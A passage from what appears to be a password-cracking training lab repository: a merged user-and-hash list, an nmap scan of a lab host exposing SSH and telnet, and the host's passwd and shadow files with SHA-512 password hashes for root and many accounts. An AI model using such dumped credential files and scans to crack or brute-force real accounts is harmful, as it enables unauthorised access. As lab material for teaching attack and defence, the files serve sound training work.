sam:$6$4IQ98NuP$Q7Kd1uQhbVl4rv9yPzn51rA8U1stcC9zCUu/o83v959HNcMXdEyZ39Ec8/cTq89v/fes.lwpozekSK16JHLr3/:1045:1045::/home/sam:/bin/sh
linux-kernel:$6$iZd1ERbp$wO5U7YmvpfM8vuJX2er3jI7JPUTv7ahoypgc2n1/CWQr9yyf7CyFcxUBj9T2tEx7KR9x3Z6/C5Q3wxumJKMuu/:1046:1046::/home/linux-kernel:/bin/sh
jonathan:$6$JN51qUeO$YRkPN8gR43gmtTEg0uycZaz3SOOwT37g17tt8bB/Fi/Xr/dKPsUhaWfOjZ1uNrJg7sL4z9srGe.zWP0B1tfQc/:1047:1047::/home/jonathan:/bin/sh
erik:$6$Ib9a2n66$vfEKmQ0LO/sV3M4PsanGWx3ATuHNFZ/FysOYhKAdG4PdXeXiLackGxLuNs7qG4KOAVVhyLAM.99pP4j8sJ3Vr1:1048:1048::/home/erik:/bin/sh
orion:$6$EnZP3LwQ$pDR2Jny9KIPDEmoB.jzhp38Ik5FyG4DWzewHoEePxdCBzFfBWnIUQNXDNup8U2IoAiUC/jaO/i9SpStI8ZgIa1:1049:1049::/home/orion:/bin/sh
doug:$6$kV2vj2S6$eKQyp76DlZbo/tgLKyjtLQf.G86BY9oVkfscbIrWwCYRqd.zJnLIOJPrGJJSvK59O.OpUc5L8vo.1yet/IndA.:1050:1050::/home/doug:/bin/sh
spam:$6$b4.yukui$byGJM8hTw11KmLes6YSfvo7IKfkg5HYtll.JOVFJgM9IObO6NE7dpLhTiHxgLLCPtXa0wbwxPAlYTtPsrCnLP.:1051:1051::/home/spam:/bin/sh
nessus:$6$5b.qaMaF$MSnDGsA6Yo7LzABXWXtdHb5HruaehdkrLbdv9Yg.lQoG9nC6patjwPqFuR1G2CSslqIZkBbZst7rhCeJXr3Z.0:1052:1052::/home/nessus:/bin/sh
bugs:$6$cJfe9yB0$DkgkyIHYGOFQ9hIF6A28Da0niQBq6Yn9PXjNKAJEK7y0sdEc6v9KSpW8DEBXg.lO/MCgpHuuAbbcAQfYs36gG/:1053:1053::/home/bugs:/bin/sh
rick:$6$SFXj7ADA$qu3mlQDjIwVNzC.3JkUKUS2Hp7aeC1Zg5GP1h7nM5BmCTsJ7d1ckSF3ErjPbpZFIqNCz6NAgy1F76PmjeJz.x0:1054:1054::/home/rick:/bin/sh
josh:$6$KU1UUsAZ$ac7T8xBfcLxXmb/qRNuEKrfZy1G/kcqsJzWJ93/qTa08itf31x5/pcdVHj30MKXYh/poaN8fOlKkZR0f2xrr3.:1055:1055::/home/josh:/bin/sh
research:$6$m0nQbAaZ$FKL3XBWkT3GEv0UVn6WTHssjyjou2/33f8BKE4voI7HWU9FdF1hABlyQAqAYhJOfRuQpuZzSBcJVvCMtMX6D51:1056:1056::/home/research:/bin/sh
craig:$6$movXAzDc$E4sBocqFLzY9iif37.1VF4uuOr5QsI7ZwrnkTM.ITDebTuEc5od/87suR9fBPGuEm4HU4pUf324z3Pxb86Sk9/:1057:1057::/home/craig:/bin/sh
sven:$6$L2Ac90qT$4NWVht13koXx1Zewnoq.aqh7584NpDNToIa41Qqbc94hwitYtA5pXZF0ZwsKRUIQ4bf0Z.5Tm9Ue5BLbw1y/61:1058:1058::/home/sven:/bin/sh
gary:$6$mbC5nX5S$baJcUKoownjBSnz6/wuXNK75gvtKZ5dub4BZwpjP1YvgkjooQ8GRbZpR4fAo0zevFiGWONgHjDkLKYxDiYIST/:1059:1059::/home/gary:/bin/sh
brett:$6$qd2dCjHj$6qWUTOIG5OmP5OcN3.cMfDr24ScByDakPNIrRZjZqcqaiHlBuFbGvDsGTIAPizkZGrIvuH7gnhAgt/hg3f9Gz/:1060:1060::/home/brett:/bin/sh
Security:$6$GPayTWXW$sSarI38ETnIzRUSXgEXambmN8FNcCuUiDqnMYeeKYzavwk0Pefw5VafzCG9jpgTnzaWrY1QlbpkNOy4c22yRu.:1061:1061::/home/Security:/bin/sh
torvalds:$6$UdO6LNso$sIErGAh.8NWiPZyarP4EqM15zKLy8ZDT4C1HixADAOHJ8MojNHFAJa33jx9qpixPiUpgibhKJpKb4gY/YgjSx1:1062:1062::/home/torvalds:/bin/sh
nate:$6$cic0vUV.$/zZv9r8/5C8D7HkGlymqTr1t248kTvSScQfyxnYldFQPQplIbfrn2R61ZHu.t0ImjP38YyMzw1Wbftpg8p9Xf0:1063:1063::/home/nate:/bin/sh
larry:$6$C1wU6KtA$XgPBkqQLm6j2QdkDfLNyyQC90Fck6.EKAKxwD0DVeHm2m8k3.r4yLB0.lqa741PXTOYpq.gZPt83GsQszfK0G1:1064:1064::/home/larry:/bin/sh
adrian:$6$.wQ4ogUx$xRH9xkYVsVAKswluFPaNZj0c/CxVyzpdBkQaZ1rpSU8IEzub91YTwTDrEJUvWnCL9K.Sfm81/lQhLY1VpbX8g1:1065:1065::/home/adrian:/bin/sh
test:$6$IKTyMZxA$C6g0kSQ7eWmmRQrB7jlFMvS4oPU48tE18sJKuPxX0QSl9QlOXwwY3U.2aTpalC3i6qcPbLSbjav0SjmlxplNp0:1066:1066::/home/test:/bin/sh
tech:$6$OTt3okCG$lrKSF4KyxVZgWlJ3uGgBRmMkChdZ8hxHyPWXS2/a2Vlq129Zq3jCZVINrW9nRG20TNsqI0MN07e88jJTGVGjd1:1067:1067::/home/tech:/bin/sh
someone:$6$Zk8ylIKZ$rFllR3qlbmirrkgwRppG0HaV9ppHK0/jHWTVeqsX3oxFKjnzgg.DnS7CMXas151xCk51CmUV4dmeL17cJ3nIZ0:1068:1068::/home/someone:/bin/sh
kris:$6$MIsyuc0b$PcN7IMMSL7Fjla0C7IayevAuLD6iQmkvGX2rIxcx0VAGr7LACwtchRrE3AcZO5yTr3MQlZac9q2tvJcQjAUiF0:1069:1069::/home/kris:/bin/sh
andreas:$6$rsAbNhaA$CAbbNGghKugILQ6glWV0tEzeVbhoMB3S92Y155EHMaGeZsi6TpCIDVjw8aWlmWGIQAdB28OLQMKgWbYEAEz8x1:1070:1070::/home/andreas:/bin/sh
akpm:$6$00w49s/D$wpRXPoKKRN4rNp11hIPCJ0v/C6BPpI.GZeihVlSfpvVd0s0zqglwb.blyf.hLsgrIbKwDI1s0Yvk6.FmArahS/:1071:1071::/home/akpm:/bin/sh
stephen:$6$ssSU27er$LdCIfDEwxxrPHZLILJoBz3Zg.wWEaVgUfxf7pd8TQXtF4d1nOtIkUav2TMY1xrbyhCutzShgIkQTeopPCwlRg/:1072:1072::/home/stephen:/bin/sh
password:$6$hy0ECcK6$FdtsdPMLymN9GYJFaWsCq16yyMY05Whd41qODKrWpSmwR1QiiOPcUtLutMJtpWkDv/AqUivlU2NChCrUZMini0:1073:1073::/home/password:/bin/sh
oliver:$6$Iv.78Pvl$x4i0h9HyFfRo5mLan7JhSIS.5Yn7W5shQQpqHMC5ToXdUTWrUYDjgIZ1DtwTU4YRUh9O6QeR84k.i.4NSfX.51:1074:1074::/home/oliver:/bin/sh
blaisorblade:$6$fI69BmWc$wrckcetwa5aKTbP0QZU7mJ3QD2yATRzag31BaCYUE0c/ESYNf1ivKrD/VsDY3D/PuIs1pup.VYm8OkwDnrUd6.:1075:1075::/home/blaisorblade:/bin/sh
roman:$6$pyat9UWx$t1ZZZGJ56DMNfl9IIWmT4DNeAQ1/RngqhGS232FytUAEtLn.duPbCoykRkfUiP2XrpV3V8Qh7wejTDsqyrXFq.:1076:1076::/home/roman:/bin/sh
postfix:$6$rMJQQZvk$EsTIxQbNZAgsETizbhaK/JUX0SAvWdXuVi0lNH1qI3kFy98e08XpH1c2fEOlCIlekhyymCiDVTP03Y/fo46pa.:1077:1077::/home/postfix:/bin/sh
nathan:$6$t1nr6qNz$GdaeXW3DynadN54N9.XGO3F1VN0kWgxfnE7i/KaPM9Rv2FVEfZaJDNMqqrcrxtHjtxH8dHMIgnIviAlXejZI0.:1078:1078::/home/nathan:/bin/sh
karl:$6$2SjYTDHQ$or6fqbKAyWYmzj7yqQov/KWIeti459Y83WCgh3hp11cQdRhzLIyOjUo1tFn/vtZpWDb6Sc94T2CL5MgMcgb0Z/:1079:1079::/home/karl:/bin/sh
jose:$6$q0dfDsFf$md83VAivCKQ0mKAt3iUhX5XyX2.mif0bdDm3qd/uu6pGPlFFdpHXiFiPrU3A5QfnksdVA.yMF2kqqARuBybmH/:1080:1080::/home/jose:/bin/sh
feedback:$6$oxHD8GmD$kGMV8tRl31iptNlU3kLM7Z9vrqSTqosZtjHseV.bFuRhrD9ZYUjxgYabUL2CaQYq6kChznrdyg1hk.L9om0eQ1:1081:1081::/home/feedback:/bin/sh
dev:$6$MDKxgwuE$vnvMEnKF/CwtqC60XEdqQO07UTrIVV0IxNoaMl3uGQy37Gh9Dl5jbg0bbAOBon2Uslmzy28AcyO7xJafdd5iw0:1082:1082::/home/dev:/bin/sh
bryan:$6$ZFlofYYU$aWT3Ig1t7xYYrkIdZb..EUaYUrwGzLSVaKhy5IJtvFTQAKUi4xf8Ek8IU2KQf6Hj9YJBY7fpuSKW052ct/qmI.:1083:1083::/home/bryan:/bin/sh
bruce:$6$bKYubhwp$8VamLKD7r3OWbnqn79l3HsuBf5X8YAR2cq6s5.Tparz2GK2dGThKQTchJ3ZHTmCV7VsJdZzqXRHiknQU2gaDf0:1084:1084::/home/bruce:/bin/sh
qmailr:$6$ewnv7baU$vgPT5H27mTC1LPskTQlmkWug1puAoIeEpWhWY65.PDOIXk09unASmKIpgYCTGIGUpXyg6Y04Sswqo2shldi30/:1085:1085::/home/qmailr:/bin/sh
jamie:$6$hKrwJ2XL$K.VjPjTb0deFuo3YIhvypxHN9Wn952X2rIbhJ.t.5Gk9uO1vqt3NH5HEw2uPwPGMYSpuM4GzfXLEO9PKO2ZM//:1086:1086::/home/jamie:/bin/sh
derek:$6$VRU46VG/$21FGTv71yuYyQ/7AtIzIqjV3GdHivvx7abiNlqe/QMffvF4NNAGRJ0cDL2eyWM2vPfIZZtcpn8P6XrcqqblYP/:1087:1087::/home/derek:/bin/sh
brandon:$6$OsORtNZ.$1Jr.wOnm6EonOFjMu7utgFiv5VT.K2Fbt0JehTIevXHom.if0w3QBWeMvXJ0BZHeA8TleiCkcozae1KOBlbHX.:1088:1088::/home/brandon:/bin/sh
risks:$6$SoZjQEuS$Nxo6bfcqQGXW7Sj40Y/7OuG4KgKMzWROATWrJ6EfO9wk0FTqQXMv2Rx6Eml3p7i7s7YM/9S6wwA8hUtcQ9sRY0:1089:1089::/home/risks:/bin/sh
proberts:$6$ft8ebMmB$pZgSxqCWt9CxaAM7KrD9PTVJRVGFeAsm9mkWavvOYlErmnmYuo/qFYSLZ.jfgbfHEwq//nz67TK4MHRm6NemL0:1090:1090::/home/proberts:/bin/sh
pierre:$6$jhaog97C$XVbyU2iMF0Fj8qMg0.PryFkhVctz50UTCzmtSvgYIJKtEzvfJ5XQ.V5aiGph2IjMOaUhSL1eDO8.sYSQDydGZ/:1091:1091::/home/pierre:/bin/sh
pgo:$6$msJLJFAW$3yLybUn97UyvcxoV77JCoRS9IVcgPb5lMYNPgc2.bQKBrZvT3Qw48GroMnA.VPPdQlGHRKRL70bYDWa8HWJOX1:1092:1092::/home/pgo:/bin/sh
maxim:$6$v4qWXFNW$xvrxBZ8gfF7fsbGJ3V94dew9bajgsxI62Ew0jM0GK/EGRVQmT6sNpEbcYzVuSK8U6ziH7R7pqWwC9Uja7eF5X0:1093:1093::/home/maxim:/bin/sh
guest:$6$6vAGLPss$5Ciwdq3qSTSTfgtrqZ.cY9SI5AtZwHN/MBqIEIhCOJcmXKDik7Je47JvyjeAng01AcfsjEMatE4tzusDIcEwU0:1094:1094::/home/guest:/bin/sh
================================================
FILE: ine-labs/bruteforce-and-password-cracking/nmap_scan.txt
================================================
# Nmap 7.91 scan initiated Sun Feb 21 14:10:57 2021 as: nmap -sV -iL alive_hosts.txt -oN nmap_scan.txt
Nmap scan report for 192.168.99.22
Host is up (0.055s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
23/tcp open telnet Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.99.100
Host is up (0.00018s latency).
All 1000 scanned ports on 192.168.99.100 are closed
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 21 14:11:07 2021 -- 2 IP addresses (2 hosts up) scanned in 9.88 seconds
================================================
FILE: ine-labs/bruteforce-and-password-cracking/passwd
================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:102:104:MySQL Server,,,:/nonexistent:/bin/false
telnetd:x:103:106::/nonexistent:/bin/false
sysadmin:x:1000:1000::/home/sysadmin:/bin/sh
info:x:1001:1001::/home/info:/bin/sh
support:x:1002:1002::/home/support:/bin/sh
abuse:x:1003:1003::/home/abuse:/bin/sh
admin:x:1004:1004::/home/admin:/bin/sh
postmaster:x:1005:1005::/home/postmaster:/bin/sh
chris:x:1006:1006::/home/chris:/bin/sh
webmaster:x:1007:1007::/home/webmaster:/bin/sh
mike:x:1008:1008::/home/mike:/bin/sh
steve:x:1009:1009::/home/steve:/bin/sh
dave:x:1010:1010::/home/dave:/bin/sh
paul:x:1011:1011::/home/paul:/bin/sh
peter:x:1012:1012::/home/peter:/bin/sh
matt:x:1013:1013::/home/matt:/bin/sh
jobs:x:1014:1014::/home/jobs:/bin/sh
joe:x:1015:1015::/home/joe:/bin/sh
user:x:1016:1016::/home/user:/bin/sh
eric:x:1017:1017::/home/eric:/bin/sh
dan:x:1018:1018::/home/dan:/bin/sh
brian:x:1019:1019::/home/brian:/bin/sh
michael:x:1020:1020::/home/michael:/bin/sh
sales:x:1021:1021::/home/sales:/bin/sh
nanog:x:1022:1022::/home/nanog:/bin/sh
jeff:x:1023:1023::/home/jeff:/bin/sh
alex:x:1024:1024::/home/alex:/bin/sh
scott:x:1025:1025::/home/scott:/bin/sh
jason:x:1026:1026::/home/jason:/bin/sh
bob:x:1027:1027::/home/bob:/bin/sh
jim:x:1028:1028::/home/jim:/bin/sh
adam:x:1029:1029::/home/adam:/bin/sh
james:x:1030:1030::/home/james:/bin/sh
tim:x:1031:1031::/home/tim:/bin/sh
majordomo:x:1032:1032::/home/majordomo:/bin/sh
daniel:x:1033:1033::/home/daniel:/bin/sh
ben:x:1034:1034::/home/ben:/bin/sh
hostmaster:x:1035:1035::/home/hostmaster:/bin/sh
tom:x:1036:1036::/home/tom:/bin/sh
snort:x:1037:1037::/home/snort:/bin/sh
andy:x:1038:1038::/home/andy:/bin/sh
andrew:x:1039:1039::/home/andrew:/bin/sh
greg:x:1040:1040::/home/greg:/bin/sh
robert:x:1041:1041::/home/robert:/bin/sh
martin:x:1042:1042::/home/martin:/bin/sh
rob:x:1043:1043::/home/rob:/bin/sh
stefan:x:1044:1044::/home/stefan:/bin/sh
sam:x:1045:1045::/home/sam:/bin/sh
linux-kernel:x:1046:1046::/home/linux-kernel:/bin/sh
jonathan:x:1047:1047::/home/jonathan:/bin/sh
erik:x:1048:1048::/home/erik:/bin/sh
orion:x:1049:1049::/home/orion:/bin/sh
doug:x:1050:1050::/home/doug:/bin/sh
spam:x:1051:1051::/home/spam:/bin/sh
nessus:x:1052:1052::/home/nessus:/bin/sh
bugs:x:1053:1053::/home/bugs:/bin/sh
rick:x:1054:1054::/home/rick:/bin/sh
josh:x:1055:1055::/home/josh:/bin/sh
research:x:1056:1056::/home/research:/bin/sh
craig:x:1057:1057::/home/craig:/bin/sh
sven:x:1058:1058::/home/sven:/bin/sh
gary:x:1059:1059::/home/gary:/bin/sh
brett:x:1060:1060::/home/brett:/bin/sh
Security:x:1061:1061::/home/Security:/bin/sh
torvalds:x:1062:1062::/home/torvalds:/bin/sh
nate:x:1063:1063::/home/nate:/bin/sh
larry:x:1064:1064::/home/larry:/bin/sh
adrian:x:1065:1065::/home/adrian:/bin/sh
test:x:1066:1066::/home/test:/bin/sh
tech:x:1067:1067::/home/tech:/bin/sh
someone:x:1068:1068::/home/someone:/bin/sh
kris:x:1069:1069::/home/kris:/bin/sh
andreas:x:1070:1070::/home/andreas:/bin/sh
akpm:x:1071:1071::/home/akpm:/bin/sh
stephen:x:1072:1072::/home/stephen:/bin/sh
password:x:1073:1073::/home/password:/bin/sh
oliver:x:1074:1074::/home/oliver:/bin/sh
blaisorblade:x:1075:1075::/home/blaisorblade:/bin/sh
roman:x:1076:1076::/home/roman:/bin/sh
postfix:x:1077:1077::/home/postfix:/bin/sh
nathan:x:1078:1078::/home/nathan:/bin/sh
karl:x:1079:1079::/home/karl:/bin/sh
jose:x:1080:1080::/home/jose:/bin/sh
feedback:x:1081:1081::/home/feedback:/bin/sh
dev:x:1082:1082::/home/dev:/bin/sh
bryan:x:1083:1083::/home/bryan:/bin/sh
bruce:x:1084:1084::/home/bruce:/bin/sh
qmailr:x:1085:1085::/home/qmailr:/bin/sh
jamie:x:1086:1086::/home/jamie:/bin/sh
derek:x:1087:1087::/home/derek:/bin/sh
brandon:x:1088:1088::/home/brandon:/bin/sh
risks:x:1089:1089::/home/risks:/bin/sh
proberts:x:1090:1090::/home/proberts:/bin/sh
pierre:x:1091:1091::/home/pierre:/bin/sh
pgo:x:1092:1092::/home/pgo:/bin/sh
maxim:x:1093:1093::/home/maxim:/bin/sh
guest:x:1094:1094::/home/guest:/bin/sh
================================================
FILE: ine-labs/bruteforce-and-password-cracking/shadow
================================================
root:$6$NMfSi/bG$y9j8uMu4glpLudMRvzznUZ5h30jlobtAJGZYRaa64pdKy3i1WLTnmPPWUxfPdZwJKReFPU/zBo8HRpD.RAkrG1:16475:0:99999:7:::
daemon:*:16315:0:99999:7:::
bin:*:16315:0:99999:7:::
sys:*:16315:0:99999:7:::
sync:*:16315:0:99999:7:::
games:*:16315:0:99999:7:::
man:*:16315:0:99999:7:::
lp:*:16315:0:99999:7:::
mail:$6$jLhDRY5M$MJPM2mmM1khh8l0taxORP7oNn4jmwHAOLWZij5DacV25Hzj1ryykobxGlprlgaCXg/PGV2Po34JF4HgPv8roQ.:16470:0:99999:7:::
news:$6$7pnXYnUf$F7t6t4A6rQf2z/ycnPuEdzMH9RGB5W0OFL420eKvp/s/SK3KaD6EM/gDNzhL9YFCthi7JVavBa8/nJCxX3XZW0:16470:0:99999:7:::
uucp:*:16315:0:99999:7:::
proxy:*:16315:0:99999:7:::
www-data:*:16315:0:99999:7:::
backup:*:16315:0:99999:7:::
list:*:16315:0:99999:7:::
irc:*:16315:0:99999:7:::
gnats:*:16315:0:99999:7:::
nobody:$6$KRss6ftU$c/nB9QsK0iZ0zj8o6VmArcgiuGZ4oOjlLeCDYioV/rrcYYtuE/xkvhdDYvRtlydkFjvlqOXdKDV/0o6fA32Qt.:16470:0:99999:7:::
libuuid:!:16315:0:99999:7:::
sshd:*:16315:0:99999:7:::
mysql:!:16315:0:99999:7:::
telnetd:*:16391:0:99999:7:::
sysadmin:$6$Sje/FZov$s6OBgDRso6O25TAo/K62bmuUjGI7po0yaa5y7n4agBKIFywDyleLs2FFNlXJiAgROHN4VD/WkfEFYIXcH9QPW1:16475:0:99999:7:::
info:$6$b7FyMcC/$Xq.S9rAti5XfKvNR8DK2U0hCusjKeqNBGxrm0W9OvfA29gg68kKRkTyut6rLIf0ib4rLilPg6uiSqCUOuoYFU.:16470:0:99999:7:::
support:$6$5UCqb4PI$080lZhjRESgv4pvv3eYze/PQFkEzIe//QBAgX4383cxPfX4B7hwsPP5d.vEOp49Nep015ISQCkD1SV.b.CeV0.:16470:0:99999:7:::
abuse:$6$wew6XAFC$bRWpMBzLUx9vps5kW8zBJlHh7y7TodfdNfClkmlTEIcs31q9TQR1nPnGYp4GO4fpcOTs/H8Ui62lFoywXMjSs.:16470:0:99999:7:::
admin:$6$u145Czfw$8UNRyCdVRM5BpO6wMZBOhJJA4tXLexxwQJhGLbJbD0FUOBWg.V/ybl6BNQVr4er3Gghg8gymvUqu1fMWqLs3V.:16470:0:99999:7:::
postmaster:$6$TNSdQqc8$Pij0H4TXEH6.i2tpomznu0uY9UFss/wG6xs1qsYQQSJ0YZNB/dBDkmq9I3O1regCsFgS9r7jSGq0GG7eIcqtK1:16470:0:99999:7:::
chris:$6$ZAY5sjcZ$htURsPqIyO4tpNUq12v2GDgAXe4oGVLYPQHDpVn7TMgLm8MP7g5hpZo5NitjHQfqvzB0dptX.fR0ciN6kkWeA/:16470:0:99999:7:::
webmaster:$6$KLM4wfkU$ZYsO.eQu2qXMfpQaSLzjgJn0dBfyiPRrb4xKT8cUWbaVI.psHzgPuWpkXiwKKWrqfSVCceQBuDVwFNQwH6qWS1:16470:0:99999:7:::
mike:$6$HZRL7RJz$PanyrCDQAvupUzoQ/SjtY1pp4DHQE4p7sVfvh6oZNbAlgUQBIf9R6TMW3wNV4976ngBUhp.39ZKbPwMYf2vsU1:16470:0:99999:7:::
steve:$6$gDpnLZEp$fd9Cptcb9W2lIYMIP/YTgmT4t2syNr99LWNmdemNdhKOpAQ3KnHMR6/BRtwyKJw2ASYWlM612anHKhT7DEua31:16470:0:99999:7:::
dave:$6$ye9cmjcs$WwHt5jEfmA3ONfKpD8YjLu2bReTpNoDByFdvfYCHD81609nrgkXEq8iV12LundO8a5oUW9h3HN4m0GYLKHM4W.:16470:0:99999:7:::
paul:$6$dJKby9gL$YOeP.Ct6VQjxDDptfdvsTjgZEuvoIzhKua8lbn9G/BAQZ5zxNMSaeTAvQYF4Tk3MR6VVmAKrEx86LC2pXmJ4o/:16470:0:99999:7:::
peter:$6$vMrS1QqI$rY7HpdXf1T2YRXcryJf7ubn98vsPD5aNduivE3biK.ExHmO1bjhn3UlW4wX2B9PPUTiNY49N88jZGKXUr/Yu3.:16470:0:99999:7:::
matt:$6$WPIf46Nd$/xQQomUKt1rkbWVDMfqJsvPQStDthciv8OwXgPQyTos8Yz3YTlP8WTwWPKyWauiYP6/EiBtAW3LhaBXo3LTXQ.:16470:0:99999:7:::
jobs:$6$fVNXa4IX$9CCRbwgJpfmQTUCTEBb9tqI0ze1vkSbMUUOusWxnH709pyzTCWdRTBtzViTuECSJBwxZhDwwjZdl7f7rtiAYg.:16470:0:99999:7:::
joe:$6$xD.dth1G$g5u/t/SnuBZCprxXo9CogU5AXcaEtWglhu0nzxZzJTimkobFgI97xCR0p66REWXfWDZ.z95SeWoGPswT0j8wU1:16470:0:99999:7:::
user:$6$nytxqfYV$.ysNgYy5wAqynOjSAt8j7wKqDVwMjhhMI/5NQZohVKtwtZjtoSHSgxhT3MkGUvP5O0INCRZihD34Dz0wB2KCQ/:16470:0:99999:7:::
eric:$6$VuEU0lI9$VCX/Tg6mxXY7wHHoCGQmw8syH39n6wrmUVgChfTd6I0Yt7Un7SFukxR0hhC2NHl6T7Fumr8hVwvML5DMF.Ua./:16470:0:99999:7:::
dan:$6$zVKkCXse$o07lxPMPnWaHQfbj6s/D23pJNzhLsKi1WGGlsVifSIXdYdQ0pCbl0Rjn/JV83HI4f0lDjBGWLv92gSeBdqCzZ/:16470:0:99999:7:::
brian:$6$o1kRvK4f$6kx2GgKATEjqgF/Ne5H3EEGBUMz/2zZwVv3kTCr7wnxqN7eKkkBATmz9Ye3C6QW/MQRW.9F6MHSGvJKnA4uFG1:16470:0:99999:7:::
michael:$6$1yCWFuPq$OiVnd4GHG/8bMLzLyWVpV47WAf7r9LYzTfGLSKI02.Ubq8YK/QsSi7EuXRM7cPC5IH9HpSkYWJQBbOUZQQHYt.:16470:0:99999:7:::
sales:$6$PsA1.Gfk$zowvm.gcO7raMNmAJ8fDLjKybTUanVmVNld/k5S7gMrwq43Q1jO2MQ/dGhNQTsCNrC2.Vwjt3/D3JKKNHJbX/.:16470:0:99999:7:::
nanog:$6$FDvdWcSH$F9T5azU4LovIyNB7wX0htrH74TJ46iHmn3QjI8lgQEKVQDeQ6Kd1skimbuTbE7.L7bl9xO7j/GpdiQp2m4c9d.:16470:0:99999:7:::
jeff:$6$6hWz2ZU6$xcj.w/GvzUWwqmpE5CVAX8pWrW/92yi/13BKzu31oH80P7KJ2kKr8rpRgMkjuIO3GjHdGg1qmYxkvNcwubsMC/:16470:0:99999:7:::
alex:$6$JyMZO.bE$h0b.97PuMtRnim8GRTiWbqxNIvLeiQ12dBTDyufyaClGhIRHnSaNQVdqFMSDY5f.qpGrk0rTxHQ8Ba8zMdk5I.:16470:0:99999:7:::
scott:$6$LawsHaww$YJJd3lCsV45nty1gHPUp2PIwC9ezfZ8R7s4X4cq16XeiNg34aD.ydJZxG09Gfbv4HhH.BUeCDe.Zg4KDxvccV/:16470:0:99999:7:::
jason:$6$fvuvc5Jr$Rtbo0pfPs4sgCreQSOKdOy2Xes8ZpGaWpRzau/zT0Fe2PfY895x9FGZUT9OlTJvRH73wuLI1DzkqVq46M8MCo.:16470:0:99999:7:::
bob:$6$O9g8kRFd$n4qyO7Pn0e0q8.JPhoszE9CT06lheE4PcMaHhB.VXQeWlsAKWoSHaOlI8QDBb0Tx9wKuuyTKsbTE7w6Znw2Uy/:16470:0:99999:7:::
jim:$6$RoQAB6qb$J6ku0OnN9AW/rlGDogQC0a8mHlM5SEpLJTvpRRYr1ozJ.1tpa14MW/txPzxJM0aDehqIskDrPgeu2GNAQriVx1:16470:0:99999:7:::
adam:$6$SMfCr27F$ZsSxV5bja0friZIyeaVwKhOta1Kde4X8Lk6HrqCWPA1Nm7TpvsoLZh1qHz/tPJSp6l/LzDIn7lOkGBC4HuD6E.:16470:0:99999:7:::
james:$6$qEJW3BIW$c8Zo6o0MABzuSLQu5Db6wFZAkNliAVC/VM4NHVu5Sd2mUb.xBIUbuvQLWbbXf6KPgtNhuzPdGrey45LtRYVSP1:16470:0:99999:7:::
tim:$6$JXamlohb$Az7LB/X.bm7J4QU//XHE9W.OGZ87wi2RVRHAWrSYxX75lrZn7vkwSGxBp/pZEZLGUJhnzE86lkIb.VPkst2Ql/:16470:0:99999:7:::
majordomo:$6$NPJJ2uUo$ct2R6b.jg.WK4dAw2wzdDgxsuHg5LUpdvz9owz.CgAb6L5o/IKsOZj6rbmaWyolhanoOxKrdsmn4.Bysh0hGo/:16470:0:99999:7:::
daniel:$6$8mksQQtb$xXcaS/KPANmdotnWrHa26J4KUaQHBQSxy5FvniWecSyIpvZtZrm9ZMCG/x0WKXzo0NOHwS6yoKYUoRwB4BDwh1:16470:0:99999:7:::
ben:$6$2iH7dNAN$zgpUqA9ZXBRRDkJuv1TrAulRGQplR5t98Gx9js77s6quNEtU/hXZLHKryYZtDZO8MJjO.ZUzs8k9QpKrRBGX51:16470:0:99999:7:::
hostmaster:$6$V5c3cv9Q$S0JMkvGW7qokXYf0lEGAw8kY29s1VKKcSz16N2fvbJHML5BZR6vZofyTGUMNGVJ1k.RNjHYdmOqdId0Ep0wO61:16470:0:99999:7:::
tom:$6$JWml6IwT$UbW187dhuYbtw983jO9EqT/m6qYzT/Ovvw9lcIpBsL./g7r6SJTDFsupsnNoavyfQ3FE2tq0tr4byVdsvxxu40:16470:0:99999:7:::
snort:$6$O/joFTvS$zFDDPUYVY3qQq45i6FgZRFx9dQdTTkWoIKE2IsoBw5FrzZGoKiLS82FcMCCr0bouOD0cX/hYswDjKD7UNN4v/1:16470:0:99999:7:::
andy:$6$vvz6/jIM$KpRwLWVb.JQZd9A/gAgmV/jdyXUr0FzU4CwOpzxVI7/7qd9pt6AFdSSMokJWL.WC7w0yFuITvyoE7iSyy4Ed6/:16470:0:99999:7:::
andrew:$6$xrxK.ZMk$SbnalSKc8SRQUuZadGTGhClUF18xjC4HTWOPlcT2D5wgRkd.ou5zLE7dyM/bBI0M9vc6WYQjQJ7Teotmc3dJN/:16470:0:99999:7:::
greg:$6$M6b5jpj3$1toGupgM1bdko05fLUrnUdDwwdB2nbK3pvpgpA.cK6dI8ZyBW0PnHX29mwK6qV4gGUZaGZGpUHCUZHQPXTW87.:16470:0:99999:7:::
robert:$6$yfsl9IAe$5ZtjNOyf7uuOo4a.Q7G.96z67KB9BHI.9ri7zeqS6HFk4RjtePvXGdD5iZCK4EJUBsyjy8KYe0NsSEz4S1jZK0:16470:0:99999:7:::
martin:$6$UMJrcI1d$ljAGjf2Ysu6WZj6OonyBqdWgC1JGBrg/cSkwA8P0AYuFUi2Nj3V8jTz77HSBCgNdBmi8Z0DpU40lkpJoKCVYi1:16470:0:99999:7:::
rob:$6$KynzgNNI$CRqz5ZCoxyw8Iz3Y4DavYHefo8e3CdPxaJAKmA8G7fVioFb3imRVsOQO9fvR94aOSywrCHx8JRZ8rox4jqVCk.:16470:0:99999:7:::
